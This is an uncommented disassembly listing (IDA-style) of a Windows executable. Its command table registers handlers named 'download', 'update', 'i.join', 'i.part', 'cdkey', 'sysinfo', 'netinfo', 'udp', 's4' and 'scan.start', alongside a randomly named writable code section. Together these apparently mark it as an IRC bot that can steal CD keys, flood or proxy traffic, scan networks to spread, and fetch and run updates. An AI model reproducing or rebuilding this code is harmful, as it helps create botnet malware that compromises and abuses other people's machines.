		mov	ecx, [edx-4]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_423118
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-228h]
		call	sub_4034FB
		pop	ecx
		retn
; ---------------------------------------------------------------------------
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-22Ch]
		xor	ecx, eax
		call	sub_402C9E
		mov	ecx, [edx-4]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_423148
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-13Ch]
		call	sub_4034FB
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CF43:				; DATA XREF: sub_401EF9+8o
		mov	edx, [esp+8]
		lea	eax, [edx-13Ch]
		mov	ecx, [edx-140h]
		xor	ecx, eax
		call	sub_402C9E
		add	eax, 0Ch
		mov	ecx, [edx-8]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_423178
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-4BCh]
		call	sub_4034FB
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CF7E:				; DATA XREF: sub_4019F3+5o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-4C8h]
		xor	ecx, eax
		call	sub_402C9E
		mov	ecx, [edx-4]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_4231A8
		jmp	sub_40484E
; ---------------------------------------------------------------------------
		push	dword ptr [ebp-4C0h]
		call	sub_4034FB
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CFB3:				; DATA XREF: sub_40177B+5o
		mov	edx, [esp+8]
		lea	eax, [edx+0Ch]
		mov	ecx, [edx-4C8h]
		xor	ecx, eax
		call	sub_402C9E
		mov	ecx, [edx-4]
		xor	ecx, eax
		call	sub_402C9E
		mov	eax, offset dword_4231D8
		jmp	sub_40484E
; ---------------------------------------------------------------------------

loc_41CFDB:				; DATA XREF: jlrllt49:0041E28Co
		call	sub_401291
		and	dword_437684, 0
		push	offset loc_41D1E3
		mov	dword_437680, eax
		call	sub_4033AF
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41CFF8:				; DATA XREF: jlrllt49:0041E290o
		call	sub_40172D
		and	dword_437690, 0
		push	offset loc_41D22C
		mov	dword_43768C, eax
		call	sub_4033AF
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41D015:				; DATA XREF: jlrllt49:0041E294o
		push	esi
		push	offset aDownload ; "download"
		mov	esi, offset off_437698
		call	sub_41C75B
		mov	off_437698, offset off_421C88
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D031:				; DATA XREF: jlrllt49:0041E298o
		push	esi
		push	offset aUpdate	; "update"
		mov	esi, offset off_437694
		call	sub_41C75B
		mov	off_437694, offset off_421C90
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D04D:				; DATA XREF: jlrllt49:0041E29Co
		push	esi
		push	offset aI_quit	; "i.quit"
		mov	esi, offset off_4376A4
		call	sub_41C75B
		mov	off_4376A4, offset off_421D04
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D069:				; DATA XREF: jlrllt49:0041E2A0o
		push	esi
		push	offset aI_join	; "i.join"
		mov	esi, offset off_43769C
		call	sub_41C75B
		mov	off_43769C, offset off_421D0C
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D085:				; DATA XREF: jlrllt49:0041E2A4o
		push	esi
		push	offset aI_part	; "i.part"
		mov	esi, offset off_4376A0
		call	sub_41C75B
		mov	off_4376A0, offset off_421D14
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D0A1:				; DATA XREF: jlrllt49:0041E2A8o
		push	esi
		push	offset aUptime	; "uptime"
		mov	esi, offset off_4376A8
		call	sub_41C75B
		mov	off_4376A8, offset off_421D78
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D0BD:				; DATA XREF: jlrllt49:0041E2ACo
		push	esi
		push	offset aHttp	; "http"
		mov	esi, offset off_4376AC
		call	sub_41C75B
		mov	off_4376AC, offset off_421D80
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D0D9:				; DATA XREF: jlrllt49:0041E2B0o
		push	esi
		push	offset aCdkey	; "cdkey"
		mov	esi, offset off_4376B0
		call	sub_41C75B
		mov	off_4376B0, offset off_421D88
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D0F5:				; DATA XREF: jlrllt49:0041E2B4o
		push	esi
		push	offset aS4	; "s4"
		mov	esi, offset off_4376B8
		call	sub_41C75B
		mov	off_4376B8, offset off_421DD4
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D111:				; DATA XREF: jlrllt49:0041E2B8o
		push	esi
		push	offset aS4_stop	; "s4.stop"
		mov	esi, offset off_4376B4
		call	sub_41C75B
		mov	off_4376B4, offset off_421DDC
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D12D:				; DATA XREF: jlrllt49:0041E2BCo
		push	esi
		push	offset aSysinfo	; "sysinfo"
		mov	esi, offset off_4376BC
		call	sub_41C75B
		mov	off_4376BC, offset off_421E9C
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D149:				; DATA XREF: jlrllt49:0041E2C0o
		push	esi
		push	offset aNetinfo	; "netinfo"
		mov	esi, offset off_4376C0
		call	sub_41C75B
		mov	off_4376C0, offset off_421EA4
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D165:				; DATA XREF: jlrllt49:0041E2C4o
		push	esi
		push	offset aUdp	; "udp"
		mov	esi, offset off_4376C4
		call	sub_41C75B
		mov	off_4376C4, offset off_421ED0
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D181:				; DATA XREF: jlrllt49:0041E2C8o
		mov	eax, dword_426824
		add	eax, 6
		mov	dword_4376C8, eax
		retn
; ---------------------------------------------------------------------------

loc_41D18F:				; DATA XREF: jlrllt49:0041E2CCo
		push	esi
		push	offset aScan_start ; "scan.start"
		mov	esi, offset off_4376D4
		call	sub_41C75B
		mov	off_4376D4, offset off_422020
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D1AB:				; DATA XREF: jlrllt49:0041E2D0o
		push	esi
		push	offset aScan_stop ; "scan.stop"
		mov	esi, offset off_4376CC
		call	sub_41C75B
		mov	off_4376CC, offset nullsub_449
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D1C7:				; DATA XREF: jlrllt49:0041E2D4o
		push	esi
		push	offset dword_41FF10
		mov	esi, offset off_4376D0
		call	sub_41C75B
		mov	off_4376D0, offset off_422030
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_41D1E3:				; DATA XREF: .text:0041CFE7o
		mov	eax, dword_437680
		mov	ecx, [eax]
		mov	[eax], eax
		mov	eax, dword_437680
		mov	[eax+4], eax
		and	dword_437684, 0
		cmp	ecx, dword_437680
		jz	short loc_41D218
		push	esi

loc_41D204:				; CODE XREF: .text:0041D215j
		mov	esi, [ecx]
		push	ecx
		call	sub_4034FB
		cmp	esi, dword_437680
		pop	ecx
		mov	ecx, esi
		jnz	short loc_41D204
		pop	esi

loc_41D218:				; CODE XREF: .text:0041D201j
		push	dword_437680
		call	sub_4034FB
		and	dword_437680, 0
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41D22C:				; DATA XREF: .text:0041D004o
		mov	eax, dword_43768C
		mov	ecx, [eax]
		mov	[eax], eax
		mov	eax, dword_43768C
		mov	[eax+4], eax
		and	dword_437690, 0
		cmp	ecx, dword_43768C
		jz	short loc_41D261
		push	esi

loc_41D24D:				; CODE XREF: .text:0041D25Ej
		mov	esi, [ecx]
		push	ecx
		call	sub_4034FB
		cmp	esi, dword_43768C
		pop	ecx
		mov	ecx, esi
		jnz	short loc_41D24D
		pop	esi

loc_41D261:				; CODE XREF: .text:0041D24Aj
		push	dword_43768C
		call	sub_4034FB
		and	dword_43768C, 0
		pop	ecx
		retn
; ---------------------------------------------------------------------------

loc_41D275:				; DATA XREF: sub_4035D9+40o
		mov	dword_427DE4, offset off_41E334
		mov	ecx, offset dword_427DE4
		jmp	sub_403258
; ---------------------------------------------------------------------------
		align 1000h
_text		ends

; Section 2. (virtual address 0001E000)
; Virtual size			: 00006000 (  24576.)
; Section size in file		: 00006000 (  24576.)
; Offset to raw	data for section: 0001E000
; Flags	E0000060: Text Data Executable Readable	Writable
; Alignment	: default
; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Write/Execute
jlrllt49	segment	para public 'CODE' use32
		assume cs:jlrllt49
		;org 41E000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
off_41E000	dd offset sub_449F82	; DATA XREF: sub_417BB2+39r
					; sub_44B7DB+4w ...
off_41E004	dd offset sub_4458DD	; DATA XREF: sub_417ADF+1Dr
					; sub_417BB2+1Br
off_41E008	dd offset sub_4438B1	; DATA XREF: sub_414954+142r
					; sub_417B4D+31r
off_41E00C	dd offset sub_442829	; DATA XREF: sub_417ADF+52r
off_41E010	dd offset sub_45B41E	; DATA XREF: sub_414954+253r
					; sub_414954+26Cr ...
off_41E014	dd offset sub_44A903	; DATA XREF: sub_41A4A1+3Cr
					; sub_445C40-232Fw ...
off_41E018	dd offset sub_4430CD	; DATA XREF: sub_41A8D9+A5r
					; sub_41A8D9+1B6r ...
off_41E01C	dd offset sub_43F100	; DATA XREF: sub_41A3CC+82r
					; y2kk37jd:0043FE61r
off_41E020	dd offset sub_44D61C	; DATA XREF: sub_41A70B+132r
					; sub_44D61C+5r ...
off_41E024	dd offset sub_458983	; DATA XREF: sub_41A889+Cr
					; y2kk37jd:00444E47w ...
off_41E028	dd offset sub_4427F5	; DATA XREF: sub_41A3CC+24r
					; sub_4427F5:loc_45BBE8r
off_41E02C	dd offset sub_45A961	; DATA XREF: sub_414954+FCr
					; sub_417B4D+14r ...
off_41E030	dd offset sub_4447EA	; DATA XREF: sub_41AB0C+299r
					; y2kk37jd:00441F07w ...
off_41E034	dd offset sub_441F1B	; DATA XREF: sub_41A4A1+19r
					; sub_4587BA-1B710w ...
off_41E038	dd offset sub_43D0BE	; DATA XREF: sub_41AB0C+27Dr
					; sub_43D0BE+5r ...
off_41E03C	dd offset sub_43CF1C	; DATA XREF: sub_41A889+2Er
					; sub_43CF1C+5r ...
off_41E040	dd offset sub_4450D1	; DATA XREF: sub_41A889+3Br
					; y2kk37jd:00450A53r ...
off_41E044	dd offset sub_454B79	; DATA XREF: sub_41A889+1Er
					; y2kk37jd:00440DD2w ...
off_41E048	dd offset sub_442F32	; DATA XREF: sub_402129+110r
					; sub_442F32+5r ...
		align 10h
off_41E050	dd offset sub_4552EB	; DATA XREF: sub_407E67+Er
					; sub_41A0E3+168r ...
off_41E054	dd offset sub_43BEDB	; DATA XREF: sub_410870+22r
					; sub_419A9F+29r ...
dword_41E058	dd 77E802FCh		; DATA XREF: sub_40B64A+5Dr
					; sub_419A20+Br ...
dword_41E05C	dd 77E61BB8h		; DATA XREF: sub_419E99+8Br
					; y2kk37jd:0043CD59r ...
dword_41E060	dd 77E7A099h		; DATA XREF: sub_40A074+99r
					; sub_40B414+2Ar ...
off_41E064	dd offset sub_447BC3	; DATA XREF: sub_419A20+19r
					; sub_4504DD-73BFw ...
dword_41E068	dd 77E7C657h		; DATA XREF: .text:00404550r
					; sub_419AD1+24r ...
off_41E06C	dd offset sub_459724	; DATA XREF: sub_40E632+234r
					; sub_4119EB+13r ...
off_41E070	dd offset sub_446FF7	; DATA XREF: sub_4191D2+31Er
					; sub_4418BAw ...
off_41E074	dd offset sub_44215E	; DATA XREF: sub_40D27E+40r
					; sub_410D1B+2Dr ...
off_41E078	dd offset sub_453849	; DATA XREF: sub_40A36D+17Fr
					; sub_40A36D+2A3r ...
off_41E07C	dd offset sub_451706	; DATA XREF: sub_414D0E+5Er
					; sub_41B423+642r ...
dword_41E080	dd 77E6BD13h		; DATA XREF: sub_41C7BA+196r
					; y2kk37jd:00441EBCr ...
off_41E084	dd offset sub_4493D7	; DATA XREF: sub_41C7BA+2D5r
					; sub_43E0F3+9w ...
off_41E088	dd offset sub_43E110	; DATA XREF: sub_40A074+194r
					; sub_40D41A+212r ...
off_41E08C	dd offset sub_4445C7	; DATA XREF: sub_4033CB+AAr
					; sub_404C4E+B9r ...
off_41E090	dd offset sub_44570F	; DATA XREF: sub_414D0E+1Cr
					; sub_41BF8C+161r ...
off_41E094	dd offset sub_44A3D2	; DATA XREF: sub_414C86+8r
					; sub_44A3D2+5r ...
off_41E098	dd offset sub_44B405	; DATA XREF: sub_402129+B3r
					; sub_44B405:loc_458664r
off_41E09C	dd offset sub_44576D	; DATA XREF: sub_41B423+5B4r
					; y2kk37jd:00442AE7w ...
dword_41E0A0	dd 77E77CCEh		; DATA XREF: sub_40A36D+3E7r
					; sub_40C517:loc_40C5C4r ...
off_41E0A4	dd offset sub_44FB07	; DATA XREF: sub_410B67+14Cr
					; sub_44FB07+5r ...
off_41E0A8	dd offset sub_45BB1F	; DATA XREF: sub_410A9C+45r
					; sub_4411C3:loc_43D790w ...
off_41E0AC	dd offset sub_44E63A	; DATA XREF: sub_410A9C+78r
					; sub_43D20F+4w ...
off_41E0B0	dd offset sub_44C88E	; DATA XREF: sub_410A9C+9Br
					; y2kk37jd:0043FE40r
off_41E0B4	dd offset sub_45BF5E	; DATA XREF: sub_40F60F+8Cr
					; y2kk37jd:00441B73w ...
off_41E0B8	dd offset sub_44BA38	; DATA XREF: sub_40F23F:loc_40F293r
					; sub_40F2BC:loc_40F314r ...
dword_41E0BC	dd 77E79824h		; DATA XREF: sub_41A258+39r
					; y2kk37jd:loc_4463B5w	...
dword_41E0C0	dd 77E7C4B7h		; DATA XREF: sub_41A258+50r
					; sub_43C5D6+9r ...
dword_41E0C4	dd 77E79E4Bh		; DATA XREF: sub_41A258+6Fr
					; y2kk37jd:004441C8w ...
dword_41E0C8	dd 77E79C90h		; DATA XREF: sub_4033CB+D9r
					; sub_404C4E+F5r ...
off_41E0CC	dd offset sub_447797	; DATA XREF: sub_41AAC1+20r
					; sub_41C7BA+26Er ...
off_41E0D0	dd offset sub_450D61	; DATA XREF: sub_41A5B4+3Br
					; sub_450D61:loc_446AC0r ...
off_41E0D4	dd offset sub_4545C0	; DATA XREF: sub_41A618+3Br
					; y2kk37jd:0044E1E1w ...
off_41E0D8	dd offset sub_4497E8	; DATA XREF: sub_40900D+4Br
					; sub_40E632+29Cr ...
dword_41E0DC	dd 77E77CC4h		; DATA XREF: sub_4058DA+60r
					; sub_405A96+169r ...
dword_41E0E0	dd 77E79F93h		; DATA XREF: sub_4056E7+39r
					; sub_405753+39r ...
off_41E0E4	dd offset sub_43F346	; DATA XREF: sub_40FAE4+2Dr
					; sub_41A2E3+30r ...
off_41E0E8	dd offset sub_457FDC	; DATA XREF: sub_4056E7+49r
					; sub_405753+49r ...
dword_41E0EC	dd 77F5157Dh		; DATA XREF: sub_403B91+79r
					; sub_4058DA+2r ...
dword_41E0F0	dd 77E704FCh		; DATA XREF: sub_402129+11Fr
					; sub_417C06+D1r ...
off_41E0F4	dd offset sub_453867	; DATA XREF: sub_4033CB+E0r
					; sub_404C4E+FCr ...
off_41E0F8	dd offset sub_444A65	; DATA XREF: sub_407CFA+1Dr
					; sub_407D3A+25r ...
dword_41E0FC	dd 77E77CB7h		; DATA XREF: .text:0040452Br
					; sub_410B67+67r ...
off_41E100	dd offset sub_45A22C	; DATA XREF: sub_41AB0C:loc_41AD74r
					; sub_447F82+9r ...
dword_41E104	dd 77E7751Ah		; DATA XREF: sub_40B64A+51r
					; sub_41810B+36r ...
dword_41E108	dd 77F51597h		; DATA XREF: sub_403B91+68r
					; .text:00404560r ...
off_41E10C	dd offset sub_44E3A8	; DATA XREF: sub_41BD8A+20r
					; sub_41BF8C+43r ...
dword_41E110	dd 77F516F8h		; DATA XREF: sub_403C6E+Fr
					; .text:00404534r ...
off_41E114	dd offset sub_457FAC	; DATA XREF: sub_40D41A+11Dr
					; sub_43E619:loc_43E622r
off_41E118	dd offset sub_45C01A	; DATA XREF: sub_40D41A:loc_40D553r
					; sub_445226+2D7r
off_41E11C	dd offset sub_45A48E	; DATA XREF: .text:0040D0C8r
					; y2kk37jd:0045911Ew ...
dword_41E120	dd 77E7C866h		; DATA XREF: sub_40C8FC+2Dr
					; sub_40C8FC+11Cr ...
off_41E124	dd offset sub_45A20C	; DATA XREF: sub_40C8FC+191r
					; y2kk37jd:0043CF9Aw ...
dword_41E128	dd 77E781F9h		; DATA XREF: sub_40C517+30r
					; sub_40C517+144r ...
off_41E12C	dd offset sub_45A89D	; DATA XREF: sub_40C517+294r
					; sub_40C517+365r ...
dword_41E130	dd 77E77EE1h		; DATA XREF: sub_40B4CD+Br
					; sub_456BCD-1115Ew ...
dword_41E134	dd 77E79924h		; DATA XREF: sub_40B4CD:loc_40B547r
					; sub_40C517+216r ...
dword_41E138	dd 77E7C9E1h		; DATA XREF: sub_40B4CD+CCr
					; y2kk37jd:00440A04r ...
off_41E13C	dd offset sub_45119A	; DATA XREF: sub_40B4CD:loc_40B5ABr
					; y2kk37jd:0043E75Ar ...
off_41E140	dd offset sub_43B2FD	; DATA XREF: sub_40B4CD+10Fr
					; sub_40B4CD+126r ...
dword_41E144	dd 77E78406h		; DATA XREF: sub_408DA0+12Br
					; sub_408DA0+1C7r ...
dword_41E148	dd 77E79C3Dh		; DATA XREF: sub_408DA0+1B5r
					; sub_40A074+169r ...
dword_41E14C	dd 77E7C931h		; DATA XREF: sub_408DA0+21Fr
					; y2kk37jd:00440488r ...
off_41E150	dd offset sub_4486B1	; DATA XREF: sub_406424+27r
					; sub_40E02D+134r ...
off_41E154	dd offset sub_44CBA4	; DATA XREF: sub_406424+77r
					; sub_4064D4+52r ...
off_41E158	dd offset sub_455F45	; DATA XREF: sub_406110+22Fr
					; sub_4526A0:loc_441D7Dw ...
dword_41E15C	dd 77E7C726h		; DATA XREF: sub_406043+11r
					; y2kk37jd:00441D96r ...
off_41E160	dd offset sub_4543DF	; DATA XREF: sub_406043+47r
					; sub_44D41Bw ...
dword_41E164	dd 77F7E21Fh		; DATA XREF: sub_405FB7+28r
					; sub_40871B+28r ...
dword_41E168	dd 77F7E300h		; DATA XREF: sub_405EDF+Dr
					; sub_40876D+28r ...
off_41E16C	dd offset sub_443AED	; DATA XREF: sub_405E8A+1r
					; sub_40E593+62r ...
dword_41E170	dd 77F51587h		; DATA XREF: sub_4058DA+78r
					; sub_40D0D4+ABr ...
off_41E174	dd offset sub_4468D0	; DATA XREF: sub_4057E9+2Br
					; sub_405A96+85r ...
dword_41E178	dd 77E79B39h		; DATA XREF: sub_4057BF+23r
					; sub_405A96+58r ...
dword_41E17C	dd 77E7C5B4h		; DATA XREF: sub_4057B6r
					; sub_405A96:loc_405B35r ...
dword_41E180	dd 77E78B61h		; DATA XREF: sub_4056E7+7r
					; sub_405753+7r ...
off_41E184	dd offset sub_43D412	; DATA XREF: sub_405004+27r
					; y2kk37jd:004429CCw ...
dword_41E188	dd 77E7A13Fh		; DATA XREF: sub_405004+4Ar
					; sub_4492F7-6ED5r ...
dword_41E18C	dd 77E778C5h		; DATA XREF: sub_404F60+59r
					; sub_405229+76r ...
dword_41E190	dd 77F522F2h		; DATA XREF: sub_402FD3+82r
					; sub_4440AB+193Cw ...
dword_41E194	dd 77E80656h		; DATA XREF: sub_403076r
					; sub_40B64A+41r ...
off_41E198	dd offset sub_43DF1F	; DATA XREF: sub_4033CB+BEr
					; sub_404C4E+D9r ...
dword_41E19C	dd 77E7C9E7h		; DATA XREF: sub_4033CB+B4r
					; sub_404C4E+CEr ...
off_41E1A0	dd offset sub_43ED86	; DATA XREF: sub_403ACE+9r
					; sub_40B64A+35r
off_41E1A4	dd offset sub_4554A3	; DATA XREF: .text:loc_40460Fr
off_41E1A8	dd offset sub_4424CA	; DATA XREF: .text:00404516r
					; sub_408DA0+15r
off_41E1AC	dd offset sub_45C5A1	; DATA XREF: sub_40477B+40r
					; sub_40FE06+222r ...
off_41E1B0	dd offset sub_44E534	; DATA XREF: sub_413F36r
					; sub_44E534:loc_43BD02r ...
dword_41E1B4	dd 77E7849Fh		; DATA XREF: sub_404DD6+24r
					; sub_40507E+56r ...
dword_41E1B8	dd 77E777EFh		; DATA XREF: sub_404F60+84r
					; sub_405229+95r ...
		align 10h
dword_41E1C0	dd 71B2ACCBh		; DATA XREF: sub_402BD0r
		align 8
dword_41E1C8	dd 1F7CD927h		; DATA XREF: sub_402BC4r
dword_41E1CC	dd 1F7CB8F8h		; DATA XREF: sub_402BBEr
dword_41E1D0	dd 1F7CD214h		; DATA XREF: sub_402BB8r
dword_41E1D4	dd 1F7D886Ah		; DATA XREF: sub_402BB2r
dword_41E1D8	dd 1F7BA3A9h		; DATA XREF: sub_402BACr
		align 10h
dword_41E1E0	dd 77428B97h		; DATA XREF: sub_419D3D+148r
					; sub_41C4FC+1E3r
		align 8
off_41E1E8	dd offset sub_43C628	; DATA XREF: sub_41810B+30r
					; sub_43C628+5r ...
off_41E1EC	dd offset sub_43BD3D	; DATA XREF: sub_4198C0+67r
					; y2kk37jd:0043B460w ...
off_41E1F0	dd offset sub_44A53E	; DATA XREF: sub_4198C0+Cr
					; sub_44A53E:loc_44F07Br ...
off_41E1F4	dd offset sub_44D0BB	; DATA XREF: sub_4198C0+B1r
					; sub_44D0BB+5r ...
off_41E1F8	dd offset sub_447F7C	; DATA XREF: sub_4198C0+94r
					; sub_440AA5+Fw ...
off_41E1FC	dd offset loc_43EE75	; DATA XREF: sub_41976B+Dr
					; sub_41976B+2570Fr ...
off_41E200	dd offset sub_43FDD6	; DATA XREF: sub_4198C0+BBr
					; sub_43FDD6+5r ...
off_41E204	dd offset sub_4508FD	; DATA XREF: sub_4198C0+A5r
					; sub_43B163+B0B9w ...
off_41E208	dd offset sub_446C9B	; DATA XREF: sub_4198C0+4Ar
					; sub_4406A2w ...
		align 10h
dword_41E210	dd 7620BD61h		; DATA XREF: sub_41C4FC+EBr
dword_41E214	dd 76214750h		; DATA XREF: sub_41C4FC+7Dr
dword_41E218	dd 7620AFB6h		; DATA XREF: sub_41C4FC+39r
		align 10h
dword_41E220	dd 71AB3C22h		; DATA XREF: sub_413F3C+20r
					; sub_41463A+C9r ...
dword_41E224	dd 71ABD755h		; DATA XREF: sub_4022EB+48r
					; sub_4191D2+4F9r
dword_41E228	dd 71AB1AF4h		; DATA XREF: sub_41452B+B0r
					; sub_41452B+F1r ...
dword_41E22C	dd 71AB60C9h		; DATA XREF: sub_41979F+FAr
dword_41E230	dd 71AB5DE2h		; DATA XREF: sub_4147B2+B7r
					; sub_41979F+10Cr
dword_41E234	dd 71AB868Dh		; DATA XREF: sub_4147B2+165r
					; sub_418FDD+1Ar
dword_41E238	dd 71AB157Eh		; DATA XREF: sub_419C46+34r
dword_41E23C	dd 71AB3E5Dh		; DATA XREF: sub_413F3C+78r
					; sub_41463A+DCr ...
dword_41E240	dd 71AB1836h		; DATA XREF: sub_41C7BA:loc_41CC0Dr
dword_41E244	dd 71AB2BBFh		; DATA XREF: sub_418CAF+7Br
					; .text:0041C350r
dword_41E248	dd 71AB1ED3h		; DATA XREF: sub_41BD8A+F7r
					; .text:0041C46Cr
dword_41E24C	dd 71AB3F8Dh		; DATA XREF: sub_41BF8C+58r
dword_41E250	dd 71AB1746h		; DATA XREF: sub_41BD8A+131r
					; sub_41BD8A+147r ...
dword_41E254	dd 71AB1890h		; DATA XREF: sub_413F3C+8Fr
					; sub_41452B+78r ...
dword_41E258	dd 71AB1444h		; DATA XREF: sub_41BD8A+11Cr
					; sub_41BF8C+12Cr
dword_41E25C	dd 71AB401Ch		; DATA XREF: sub_41B423+3Cr
					; sub_41B423+6E4r ...
dword_41E260	dd 71AB1B7Bh		; DATA XREF: sub_402BCAr
dword_41E264	dd 71AB12F8h		; DATA XREF: sub_4022EB+37r
					; .text:0041C339r
dword_41E268	dd 71AB155Ah		; DATA XREF: sub_413F3C+54r
dword_41E26C	dd 71AB5690h		; DATA XREF: sub_41452B+14r
					; sub_41463A+64r ...
dword_41E270	dd 71AB1746h		; DATA XREF: sub_413F3C+34r
					; sub_4147B2+81r ...
dword_41E274	dd 71AB41DAh		; DATA XREF: sub_41C7BA+399r
dword_41E278	dd 71ABF628h		; DATA XREF: sub_4191D2+4C9r
dword_41E27C	dd 71AB3ECEh		; DATA XREF: sub_4147B2+9Er
					; sub_41979F+D7r ...
dword_41E280	dd 71AB1A6Dh		; DATA XREF: sub_402086+11r
					; sub_413F3C+98r ...
		align 8
dword_41E288	dd 0			; DATA XREF: sub_407F39+49o
		dd offset loc_41CFDB
		dd offset loc_41CFF8
		dd offset loc_41D015
		dd offset loc_41D031
		dd offset loc_41D04D
		dd offset loc_41D069
		dd offset loc_41D085
		dd offset loc_41D0A1
		dd offset loc_41D0BD
		dd offset loc_41D0D9
		dd offset loc_41D0F5
		dd offset loc_41D111
		dd offset loc_41D12D
		dd offset loc_41D149
		dd offset loc_41D165
		dd offset loc_41D181
		dd offset loc_41D18F
		dd offset loc_41D1AB
		dd offset loc_41D1C7
dword_41E2D8	dd 0			; DATA XREF: sub_407F39+50o
dword_41E2DC	dd 0			; DATA XREF: sub_407F39+2Do
		dd offset sub_403344
; ---------------------------------------------------------------------------
		retn
; ---------------------------------------------------------------------------
		db 53h,	40h, 0
		dd offset sub_40864A
		dd offset sub_40AEEF
		dd offset sub_40FDF9
		dd offset sub_40B74A
dword_41E2F8	dd 0			; DATA XREF: sub_407F39+28o
dword_41E2FC	dd 0			; DATA XREF: sub_407FCB+73o
		dd offset sub_411A0A
		dd offset sub_4086FB
dword_41E308	dd 0			; DATA XREF: sub_407FCB:loc_408039o
dword_41E30C	dd 0			; DATA XREF: sub_407FCB+83o
		dd offset sub_40B76B
dword_41E314	dd 3 dup(0)		; DATA XREF: sub_407FCB:loc_408049o
dword_41E320	dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh, 42226Ch
					; DATA XREF: .data:00424000o
					; .data:00424004o ...
off_41E334	dd offset loc_401043	; DATA XREF: sub_401038o
					; .text:00401046o ...
		dd offset sub_40326E
		dd offset dword_422220
off_41E340	dd offset loc_4010C5	; DATA XREF: sub_401065+20o
					; sub_40109A+Ao ...
		dd offset sub_4010B7
		dd offset dword_4221D0
off_41E34C	dd offset loc_4010EC	; DATA XREF: .text:loc_4010E1o
					; .text:004010EFo ...
		dd offset sub_4010B7
		dd offset dword_422090
off_41E358	dd offset loc_402BE6	; DATA XREF: sub_402BDBo
					; .text:00402BE9o ...
		dd offset sub_4010B7
aStringTooLong	db 'string too long',0  ; DATA XREF: sub_402C08+Co
aInvalidStringP	db 'invalid string position',0 ; DATA XREF: sub_402C47+Co
		dd offset dword_4220E0
off_41E38C	dd offset loc_40327B	; DATA XREF: sub_403189+Ao
					; sub_40319A+9o ...
		dd offset sub_40326E
aUnknownExcepti	db 'Unknown exception',0 ; DATA XREF: sub_40326E+7o
		align 4
		dd offset dword_4220F4
off_41E3AC	dd offset loc_403589	; DATA XREF: sub_40357B+1o
					; .data:off_424008o ...
oword_41E3B0	xmmword	3FF00000000000003FF0000000000000h ; DATA XREF: sub_404380+E3r
					; sub_404380+10Ar
oword_41E3C0	xmmword	4330000000000000433h ; DATA XREF: sub_404380+46r
oword_41E3D0	xmmword	0		; DATA XREF: sub_404380:loc_404481r
oword_41E3E0	xmmword	7FFh		; DATA XREF: sub_404380+5Fr
dbl_41E3F0	db 0, 0, 0, 0, 0, 0, 0,	80h ; DATA XREF: sub_404380:loc_40447Ar
dword_41E3F8	dd 0E06D7363h, 1, 2 dup(0) ; DATA XREF:	sub_40477B+Eo
		dd 3, 19930520h, 2 dup(0)
off_41E418	dd offset dword_427E00	; DATA XREF: sub_404C4E+D4o
		dd offset dword_427E58
		dd 4030201h, 8070605h, 0C0B0A09h, 100F0E0Dh, 14131211h
		dd 18171615h, 1C1B1A19h, 201F1E1Dh, 24232221h, 28272625h
		dd 2C2B2A29h, 302F2E2Dh, 34333231h, 38373635h, 3C3B3A39h
		dd 403F3E3Dh, 44434241h, 48474645h, 4C4B4A49h, 504F4E4Dh
		dd 54535251h, 58575655h, 5C5B5A59h, 605F5E5Dh, 64636261h
		dd 68676665h, 6C6B6A69h, 706F6E6Dh, 74737271h, 78777675h
		dd 7C7B7A79h, 7F7E7Dh
byte_41E4A0	db 3Dh,	0		; DATA XREF: jlrllt49:0041FBB0o
word_41E4A2	dw 0			; DATA XREF: sub_40B144+1Bo
					; jlrllt49:0041FB90o ...
aEncodepointer	db 'EncodePointer',0    ; DATA XREF: sub_4056E7+43o
					; sub_405826+2Eo
		align 4
aKernel32_dll	db 'KERNEL32.DLL',0     ; DATA XREF: sub_4056E7:loc_40571Bo
					; sub_405753:loc_405787o ...
		align 4
aDecodepointer	db 'DecodePointer',0    ; DATA XREF: sub_405753+43o
					; sub_405826+42o
		align 4
aFlsfree	db 'FlsFree',0          ; DATA XREF: sub_405A96+44o
aFlssetvalue	db 'FlsSetValue',0      ; DATA XREF: sub_405A96+37o
aFlsgetvalue	db 'FlsGetValue',0      ; DATA XREF: sub_405A96+2Ao
dword_41E4F4	dd 41736C46h		; DATA XREF: sub_405A96+22o
byte_41E4F8	db 6Ch			; DATA XREF: sub_406F97+177r
		db 6Ch,	6Fh, 63h
		align 10h
aNull:					; DATA XREF: .data:off_424928o
		unicode	0, <(null)>,0
		align 10h
aNull_0		db '(null)',0           ; DATA XREF: .data:off_424924o
		align 4
byte_41E518	db 6			; DATA XREF: sub_406F97:loc_407120r
		db 2 dup(0), 6
		dd 100h, 6030010h, 10020600h, 45454504h, 5050505h, 303505h
